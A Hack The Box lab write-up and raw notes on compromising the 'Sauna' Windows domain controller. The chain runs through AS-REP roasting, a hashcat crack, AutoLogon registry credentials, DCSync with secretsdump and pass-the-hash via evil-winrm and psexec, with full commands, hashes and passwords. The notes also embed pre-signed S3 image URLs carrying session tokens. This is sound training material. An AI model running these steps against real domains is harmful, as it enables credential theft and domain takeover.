Hack The Box · Lab
EasyWindowsActive DirectoryKerberos

Target: 10.10.10.175 | Difficulty: Easy | OS: Windows | Domain: EGOTISTICAL-BANK.LOCAL

Environment Setup

export IP=10.10.10.175
export DOMAIN=EGOTISTICAL-BANK.LOCAL
echo "$IP sauna.egotistical-bank.local egotistical-bank.local" | sudo tee -a /etc/hosts

Step 1 — Port Scan & Service Enumeration

Why: Identify exposed services and confirm this is a Domain Controller with web and WinRM access.

nmap -sCV -p- --min-rate 5000 -oN sauna.nmap $IP

Output:

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

Key findings: Standard AD DC profile. HTTP (80) and WinRM (5985) are both exposed — worth enumerating the web service for usernames.

Step 2 — Web Reconnaissance & Username Generation

Why: The bank's public website may expose employee names that can be converted to valid AD username formats for a Kerberos attack.

# Browse http://$IP/about.html — the "Meet The Team" staff page lists:
# Fergus Smith, Shaun Coins, Hugo Bear, Bowie Taylor, Sophie Driver, Steven Kerb, Jenny Joy

# Generate common AD username formats:
cat > users.txt << 'EOF'
fsmith
scoins
hbear
btaylor
sdriver
skerb
jjoy
fergus.smith
shaun.coins
hugo.bear
bowie.taylor
sophie.driver
steven.kerb
jenny.joy
f.smith
s.coins
h.bear
smithf
EOF

Key findings: Seven employee names enumerated from the About page. Multiple AD username formats generated for AS-REP roast testing.

Step 3 — AS-REP Roasting

Why: If any accounts have Kerberos pre-authentication disabled, we can request an encrypted AS-REP ticket without credentials and crack it offline.

impacket-GetNPUsers $DOMAIN/ -usersfile users.txt -dc-ip $IP -no-pass -format hashcat

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:1c8f...e4a2$<hash>
hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt --force

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23

Key findings: fsmith (Fergus Smith) has pre-authentication disabled. Cracked offline: fsmith:Thestrokes23.

Step 4 — WinRM Access as fsmith

Why: Port 5985 (WinRM) is open — if fsmith is in Remote Management Users, we get a shell directly.

evil-winrm -i $IP -u fsmith -p 'Thestrokes23'

Output:

Evil-WinRM shell v3.x
*Evil-WinRM* PS C:\Users\fsmith\Documents>
type C:\Users\fsmith\Desktop\user.txt

Key findings: Shell as fsmith. User flag captured.

Step 5 — AutoLogon Credential Discovery

Why: Windows AutoLogon stores service account credentials in the registry in cleartext — a common misconfiguration when a low-privilege account needs to log in automatically.

*Evil-WinRM* PS> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon"

Output:

DefaultDomainName    REG_SZ    EGOTISTICALBANK
DefaultUserName      REG_SZ    EGOTISTICALBANK\svc_loanmgr
DefaultPassword      REG_SZ    Moneymakestheworldgoround!

Key findings: AutoLogon configured with svc_loanmgr:Moneymakestheworldgoround! stored in plaintext.

Step 6 — BloodHound Enumeration as svc_loanmgr

Why: Map Active Directory ACL paths from svc_loanmgr to discover privilege escalation routes toward Domain Admin.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' \
  -d $DOMAIN -dc sauna.egotistical-bank.local -ns $IP --zip -c All
# BloodHound GUI → Mark svc_loanmgr as Owned
# Shortest Paths to Domain Admins:
# svc_loanmgr → GetChanges + GetChangesAll → EGOTISTICAL-BANK.LOCAL
# → DCSync rights!

Key findings: svc_loanmgr holds GetChanges and GetChangesAll rights on the domain object — full DCSync capability without touching LSASS.

Step 7 — DCSync → Dump Administrator Hash

Why: DCSync impersonates a Domain Controller replication request to extract NTLM hashes for any account directly from Active Directory.

impacket-secretsdump $DOMAIN/svc_loanmgr:'Moneymakestheworldgoround!'@$IP \
  -just-dc-user administrator

Output:

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Key findings: Administrator NT hash extracted: 823452073d75b9d1cf70ebdf86c7f98e.

Step 8 — Pass-the-Hash → Domain Admin

Why: WinRM accepts NTLM authentication — pass the Administrator hash directly without needing to crack it.

evil-winrm -i $IP -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents>
type C:\Users\Administrator\Desktop\root.txt

Key findings: Full Domain Admin access via pass-the-hash. Root flag captured.

Credentials

Username Password / Hash Source
fsmith Thestrokes23 AS-REP Roast (KRB5 offline crack)
svc_loanmgr Moneymakestheworldgoround! AutoLogon registry (cleartext)
Administrator 823452073d75b9d1cf70ebdf86c7f98e (NT) DCSync via svc_loanmgr

Full Attack Chain

Web Staff Page (/about.html)
        │
        ▼ Enumerate employee names → generate username wordlist
AS-REP Roast (GetNPUsers — no pre-auth on fsmith)
        │
        ▼ hashcat -m 18200 → Thestrokes23
fsmith:Thestrokes23
        │
        ▼ evil-winrm :5985
USER FLAG
        │
        ▼ reg query winlogon (AutoLogon plaintext)
svc_loanmgr:Moneymakestheworldgoround!
        │
        ▼ BloodHound → GetChanges + GetChangesAll on domain
DCSync Rights on EGOTISTICAL-BANK.LOCAL
        │
        ▼ secretsdump -just-dc-user administrator
Administrator:823452073d75b9d1cf70ebdf86c7f98e
        │
        ▼ evil-winrm -H (Pass-the-Hash)
DOMAIN ADMIN / ROOT FLAG

© 0xNRG — Sauna pwned — 2020-07-18

notes

Startoff with nmap

basic


```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown
```


scan on spec ports


```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 14:12:42Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-27T14:12:45
|_  start_date: N/A
|_clock-skew: 7h00m00s
```

HTTP p80

![Screenshot_2025-07-27_at_9.24.19_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/765900b2-381a-4af5-89fe-0ff1c5a93c93/Screenshot_2025-07-27_at_9.24.19_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466RLJZXYYO%2F20260707%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260707T064550Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJ7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCICO7e1Sa7lvfZS3N%2BRoTbbxjIMCWCGMa0KiouyxEl7CQAiEAiy05412RtKnEg0P9of8A%2BaM%2BVdh9LWtabFiPdO3Mydwq%2FwMIZxAAGgw2Mzc0MjMxODM4MDUiDF6b1dQ8fDdFwT8MHyrcA0G9loKWqYV7FDpU20EXEv6PgVIjEprwyrPzoiwfUILn6I17HFdtvlvlcsotm5nivmlm%2BnXdH0TW5F8dZ0nkApJ0cf19Jp7gKMMuBtGOm4qb7pga23zqNAVnfx4PNrKimieCoK9DLM0lmumjlpI8t%2BNrHwZScaispgJ62tUAqYGqa4REd5UYLPjS1EgZLNeUBnoKRKA43uGtJkksDWbLnwExk44FazwyZ3mvBYTQr5GrvI9z8a07g3WnDvMaWsSudhWRltD2bY2G%2B5BriwAn0fAU2ETOsyJJURLwVDygK7RdaY0i6HCLmLGEzi9Rd9AFPZ3Ed5bmziOATPzbj6CNONBd21zDxyWIB0GSY4HkM%2F1RNQl%2BwGW8SpzgI%2B0auLJrIeYBArud3bkwKNwok9AJYR%2FCbvXxW%2BGlxukxzGkDWeUGzYqe0lPiUIcXNnDWwzcnt2TCZ3nzbFA0zyUcWjXlgJ890T0c4%2FvfhNxZlJ95l%2FJiyGJSYxoeXv0C4gzp%2BRbab3yG5CPCEQ%2Br%2Bt6VLnShG3dBovRez9KZG4dfsasTFVepfF652ZceL%2FpwuBsSn8oZ5Qa%2FQNQhgZ053ilGdOsFeBvlCMUA1f2MScOUa%2F3ny1J3txfaIJyG%2FIbVto0yMNmxstIGOqUB2NpwvY9bPidfUF49C%2FYzafqhQJIij2jvMk8p0qA6Mo2Qhr%2F9VggOCL3AVKV%2FtSXMnyLlyn2UOOddcpUaUPe%2BcLCPf5dFRy9yCghYXLs7FKsnYoVsGigmcdDNnY%2BJK2WAZixU9xAeTAUSxBHrept8%2FCt8kBXdkgMWFC3Y%2FaZw7tyLMXwpmGRmZZjHv8RAEdVWLm94a4rwpy3R8OnrIuBKsxSUlYBK&X-Amz-Signature=ad78a5d393dd96125c8919daa0b527ca01e825582326ccb6637f029b7cc42709&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Possible users?


![Screenshot_2025-07-27_at_9.26.13_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/f25a4365-056e-497a-87a8-323dcc8647aa/Screenshot_2025-07-27_at_9.26.13_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466RLJZXYYO%2F20260707%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260707T064550Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJ7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCICO7e1Sa7lvfZS3N%2BRoTbbxjIMCWCGMa0KiouyxEl7CQAiEAiy05412RtKnEg0P9of8A%2BaM%2BVdh9LWtabFiPdO3Mydwq%2FwMIZxAAGgw2Mzc0MjMxODM4MDUiDF6b1dQ8fDdFwT8MHyrcA0G9loKWqYV7FDpU20EXEv6PgVIjEprwyrPzoiwfUILn6I17HFdtvlvlcsotm5nivmlm%2BnXdH0TW5F8dZ0nkApJ0cf19Jp7gKMMuBtGOm4qb7pga23zqNAVnfx4PNrKimieCoK9DLM0lmumjlpI8t%2BNrHwZScaispgJ62tUAqYGqa4REd5UYLPjS1EgZLNeUBnoKRKA43uGtJkksDWbLnwExk44FazwyZ3mvBYTQr5GrvI9z8a07g3WnDvMaWsSudhWRltD2bY2G%2B5BriwAn0fAU2ETOsyJJURLwVDygK7RdaY0i6HCLmLGEzi9Rd9AFPZ3Ed5bmziOATPzbj6CNONBd21zDxyWIB0GSY4HkM%2F1RNQl%2BwGW8SpzgI%2B0auLJrIeYBArud3bkwKNwok9AJYR%2FCbvXxW%2BGlxukxzGkDWeUGzYqe0lPiUIcXNnDWwzcnt2TCZ3nzbFA0zyUcWjXlgJ890T0c4%2FvfhNxZlJ95l%2FJiyGJSYxoeXv0C4gzp%2BRbab3yG5CPCEQ%2Br%2Bt6VLnShG3dBovRez9KZG4dfsasTFVepfF652ZceL%2FpwuBsSn8oZ5Qa%2FQNQhgZ053ilGdOsFeBvlCMUA1f2MScOUa%2F3ny1J3txfaIJyG%2FIbVto0yMNmxstIGOqUB2NpwvY9bPidfUF49C%2FYzafqhQJIij2jvMk8p0qA6Mo2Qhr%2F9VggOCL3AVKV%2FtSXMnyLlyn2UOOddcpUaUPe%2BcLCPf5dFRy9yCghYXLs7FKsnYoVsGigmcdDNnY%2BJK2WAZixU9xAeTAUSxBHrept8%2FCt8kBXdkgMWFC3Y%2FaZw7tyLMXwpmGRmZZjHv8RAEdVWLm94a4rwpy3R8OnrIuBKsxSUlYBK&X-Amz-Signature=97b90ed66653eac47881d73017219dc769a4b6ea4f4a5156e93f212afe7c9ff9&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

SMB Anonymous Auth success

Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)

Guest access null

Anon/guest share enum null

LDAP Anonymous auth success

windapsearch


```shell
❯ py /root/offsec/tools/windapsearch/windapsearch.py -d $DOMAIN --dc-ip $IP -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users

[*] Bye!
```

RPC Anon Auth null

We collected users from webpage and used usernames-generator.py

Used kerbrute with generated list and got hash from Fsmith due to no pre auth on account. It is encryption $18.

$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:274c882102df475650885d34e854453d$04cfd3ca758d056eae2098ad4fd96c375f60edc7e46ca226428b38c21264a47871cb5468880b1125a242333c66a49c7848b59cfb1f1fb3d0ad057f4283918148fdac531fb4a12435cd6584b2110ad8efd452eebe75bf4e62c1a2df19a87dcb39952a93a514820a805bbfae6b7036a785c18d5c2ca6053020e645e33582efd9659261d2749f35ccc0183bf93d29a83d0e6c7f97fde4eb4bb123fc1073b3b3108b2f274a73a145ca7f3275fb8cb5c1c27bcb272a5aa5d3764c56c244853f1f1f6b191664fc2ee91df460fd1be178b9053a63c33dc2eaa45a5b32b83b929c89b055bb1fa0c7f1a600b7c0190975e7ac86129b1bc34bcf0595af4be6bf01ae2aa6ec2a9e0988f1efb1c1f91a701adba50c919f9a2c9b3895

After running GetNPUsers.py we got Fsmith $23 TGT

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67a11e6a2abbed3aa5c07d94d84f71e$f0c81c4b62bec0393e3146838b18e7b3a28385eaef52ccc3aa47bd91e7d54fbc15313195e50b0d8537e2fbcdd4c182a8e340570b4b6129201a14495f371fb67e57e24a505bdef08632446a243596ee8a7d932a025107eaaae658c4d15965c8bf94f0afc15da92ff5bcdb5edf1258d973ba18f989379cbabf104ea7bec73832d72fa330b88c838c6b95e6c0bf55ac1472ef8522a90b3b2ad9b385cf96976e6bd8f5592aa0d02b1b954c13088541df86dbd2d8071024f2aab5feb65d4a23620d38218a6183d8be2138a105557d10bb327664017cc21e918c97db7796e0e07d109a0b6677607c418bd7672d6a1d0cdb1e889f9387024764d84a6b30d59f20b4e23d

TGT Cracked with hashcat

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67...SNIP...3d:Thestrokes23

Authorizing as fsmith from here on

SMB user enum

```shell
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr
```


shares enum


```shell
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
print$          READ            Printer Drivers
RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SYSVOL          READ            Logon server share
```


Write perm on RICOH..


    dir don’t exist


smb rid brute & awk for `SidTypeUser`


```shell
Administrator
Guest
krbtgt
SAUNA$
HSmith
FSmith
svc_loanmgr
```

No TGT pre auth for the rest of users

WinRM

```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)
```


```shell
❯ evil-winrm -i $IP -u $USER -p $PASS
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```

PRIVESC

Uplaoded `winPEASx64.exe to target.

```shell
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

Bloodhound

![Screenshot_2025-07-27_at_11.22.53_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/39aafe7a-1717-4a20-b427-589cb8ad95e5/Screenshot_2025-07-27_at_11.22.53_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466QOMF4SL4%2F20260707%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260707T064551Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJ7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJGMEQCIAxb3q4VsOxar8RdMWdhNakXmYhMOiJAyku5fThc3Z8bAiBgXeQgv4v6PYI47lYLtIQVGLYt2%2FR40TmFyelcU3VoBir%2FAwhnEAAaDDYzNzQyMzE4MzgwNSIMKwmox6URcj3VKpl3KtwD9t%2Fh8fdkO0tPQRRxLk4xGIKjACWxl5tERAze%2Bf8CoiGoO56jloPrJRyfIb2XfTkaAXWn%2BdBwbkK6vqNG7RY%2BwqV5Yy4Wk9Ya7%2BBKp0hb99Pl9BMIxGa6RgFjokZL9A3NDxh1g%2BdMMJtLNw%2FflE%2BY%2B%2F4oei0egs5ZKgMCk5d%2FXn%2BlYzW59PwCD6cXrm0P78e0CM5J2XLsu%2BBphFktwnoEmA1z5YqPCQG%2BtjGjrEe9JMixGMUjO0jYXpyv%2BATrkwuPsLdNvzCsEVT7S8akM81vsAiFzWWTD6q5agKDNyiThvFJiC5qFi5y1CwlQ07xQxaH%2BbigUsXbcxvU%2B1iEPh%2BkX0tdZaXh9%2FzXIdbPFbT8mWuizCBDXmzFeBwysk0q8yZvnWZoTLa%2Fh%2Ffq2McZn9yXj2xNiETIabW9%2F9%2FVTWC6RASOBNZGvhBFAy%2FF2PdXiekkNNe3ciiwTlZYLedtT5s3O3Ugb7tiIAsnE5iRdCiSiI%2BpNC5IjYeJGkEBkdHrf55CR%2FWp78GtVkIjWVNPcpJDibVysqbfqX5SpWye0h%2FxG%2BGrahcwHKlBOVaN%2Feb6B2TxxOv2MX6%2Bm6U31NxDf%2F4X8TJQstnTs37AlJP4%2B0yDnVe9fnQChdeC16%2F8TckwiLCy0gY6pgFa6krZG5DFpmi2U8jrfF9Q%2BW3EvQaNrtLU3qyAu6XBFNdX1zKne1aWGela0sw7kG3oX2QgtI6fYDtDhygMZscFVdEjpjr%2FmOTQ%2BBfGCvchlSNPJr0b%2B4V%2FftH457Q7qMuqqPOw%2FzqusaoIMZxucExBqe8DfgZwO9m30Ze9bD4ie94E8wmwTOASAGPxVSE9Ba6fn1%2BfUPNZoHEt5gWkh7uTpuxuuZV5&X-Amz-Signature=af3bbcfca4a69a8a1952e65e4bfccb50394ba0ad4a56ebf063c886b0ce4ca975&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


![Screenshot_2025-07-27_at_11.23.24_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/605cdd4d-b2d1-48f2-9be6-8916b5f383d9/Screenshot_2025-07-27_at_11.23.24_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466QOMF4SL4%2F20260707%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260707T064551Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJ7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJGMEQCIAxb3q4VsOxar8RdMWdhNakXmYhMOiJAyku5fThc3Z8bAiBgXeQgv4v6PYI47lYLtIQVGLYt2%2FR40TmFyelcU3VoBir%2FAwhnEAAaDDYzNzQyMzE4MzgwNSIMKwmox6URcj3VKpl3KtwD9t%2Fh8fdkO0tPQRRxLk4xGIKjACWxl5tERAze%2Bf8CoiGoO56jloPrJRyfIb2XfTkaAXWn%2BdBwbkK6vqNG7RY%2BwqV5Yy4Wk9Ya7%2BBKp0hb99Pl9BMIxGa6RgFjokZL9A3NDxh1g%2BdMMJtLNw%2FflE%2BY%2B%2F4oei0egs5ZKgMCk5d%2FXn%2BlYzW59PwCD6cXrm0P78e0CM5J2XLsu%2BBphFktwnoEmA1z5YqPCQG%2BtjGjrEe9JMixGMUjO0jYXpyv%2BATrkwuPsLdNvzCsEVT7S8akM81vsAiFzWWTD6q5agKDNyiThvFJiC5qFi5y1CwlQ07xQxaH%2BbigUsXbcxvU%2B1iEPh%2BkX0tdZaXh9%2FzXIdbPFbT8mWuizCBDXmzFeBwysk0q8yZvnWZoTLa%2Fh%2Ffq2McZn9yXj2xNiETIabW9%2F9%2FVTWC6RASOBNZGvhBFAy%2FF2PdXiekkNNe3ciiwTlZYLedtT5s3O3Ugb7tiIAsnE5iRdCiSiI%2BpNC5IjYeJGkEBkdHrf55CR%2FWp78GtVkIjWVNPcpJDibVysqbfqX5SpWye0h%2FxG%2BGrahcwHKlBOVaN%2Feb6B2TxxOv2MX6%2Bm6U31NxDf%2F4X8TJQstnTs37AlJP4%2B0yDnVe9fnQChdeC16%2F8TckwiLCy0gY6pgFa6krZG5DFpmi2U8jrfF9Q%2BW3EvQaNrtLU3qyAu6XBFNdX1zKne1aWGela0sw7kG3oX2QgtI6fYDtDhygMZscFVdEjpjr%2FmOTQ%2BBfGCvchlSNPJr0b%2B4V%2FftH457Q7qMuqqPOw%2FzqusaoIMZxucExBqe8DfgZwO9m30Ze9bD4ie94E8wmwTOASAGPxVSE9Ba6fn1%2BfUPNZoHEt5gWkh7uTpuxuuZV5&X-Amz-Signature=ba10f019e7e2b0af327ea979a98f934cd6eb188928dd685e0f242b7f3a4996f8&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Lets use secretdump


```shell
❯ secretsdump.py $DOMAIN/$USER:$PASS@$IP -just-dc-user Administrator

...SNIP...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
```

We have Administrator HASH

Let’s pass the hash


```shell
❯ evil-winrm -i $IP -u $USER -H $HASH
                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
```

Let’s use psexec also

❯ psexec.py $DOMAIN/$USER@$IP -hashes $HASH

C:\Windows\system32> whoami
nt authority\system

image.png